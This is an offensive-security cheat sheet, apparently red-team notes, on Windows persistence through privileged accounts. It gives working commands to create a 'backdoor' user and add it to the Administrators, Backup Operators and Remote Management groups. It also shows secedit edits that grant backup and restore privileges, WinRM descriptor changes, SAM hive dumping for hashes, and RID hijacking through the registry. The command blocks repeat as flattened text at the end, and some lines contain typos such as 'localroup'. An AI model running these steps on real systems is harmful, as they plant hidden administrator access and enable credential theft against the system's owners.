Adding Privileged Users

Adding users to privileged groups

# Creating user
net user backdoor /add

# Adding user to the administrators group
net localgroup "administrators" backdoor /add

# Adding user to "Backup Operators" group
net localgroup "Backup Operators" backdoor /add

# Adding user to "Remote Management Users" for RDP
net localroup "Remote Management users" backdoor /add

By default, the UAC strips the remote user of it's administrative privs, this can be disabled.
As a member of "Backup Operators", we can now save system and sam hives from the regsitery and use Impacket to get the system hash.

Assigning privileges to users.

By default, the 'backup Operators' have two privileges:
- SeBackupPrivilege: User can read write any file in the system, ignoring any DACL in place
- SeRestorePrivilege: User can read read any file in the system, ignoring any DACL in place
A user can be assigned these privileges using secedit command.

# Export current configuration
secedit /export /cfg config.inf

# Edit the config.inf to add the username in front of the privielge
SeBackupPrivilege = *S-1-5-32-544,*S-1-5-32-551,backdoor
SeRestorePrivilege = *S-1-5-32-544,*S-1-5-32-551,backdoor

# convert the config.inf file to config.sdb
secedit /import /cfg config.inf /db config.sdb
secedit /configure /db config.sdb /cnf /config.inf

Enable win-rm without adding user to "Remote Management Users"

Add the user to the security descriptor of Win-RM.

# this will launch the configuration windows for the Win-RM's security descriptor
Set-PSSessionconfiguration -Name Microsoft.Powershell -showSecurityDescriptorUI

RID hijacking

Changing the effective RID of a user to RID of an administrator so that when the user logs in, it will have the same access tokens as an administrator.
Effective RID is stored in F key at:

HKLM\SAM\SAM\Domain\Account\Users\RID(hex)

SAM is restricted to SYSTEM only.

PsExec64.exe -i -s regedit

Effective RID is located at 0x30 location in little endian format
After changing the effective RID to 500 (0x01F4), the next time users logs in, it will get Administrators privileges.

Last updated 6 months ago

# Creating user net user backdoor /add # Adding user to the administrators group net localgroup "administrators" backdoor /add # Adding user to "Backup Operators" group net localgroup "Backup Operators" backdoor /add # Adding user to "Remote Management Users" for RDP net localroup "Remote Management users" backdoor /add

# Export current configuration secedit /export /cfg config.inf # Edit the config.inf to add the username in front of the privielge SeBackupPrivilege = *S-1-5-32-544,*S-1-5-32-551,backdoor SeRestorePrivilege = *S-1-5-32-544,*S-1-5-32-551,backdoor # convert the config.inf file to config.sdb secedit /import /cfg config.inf /db config.sdb secedit /configure /db config.sdb /cnf /config.inf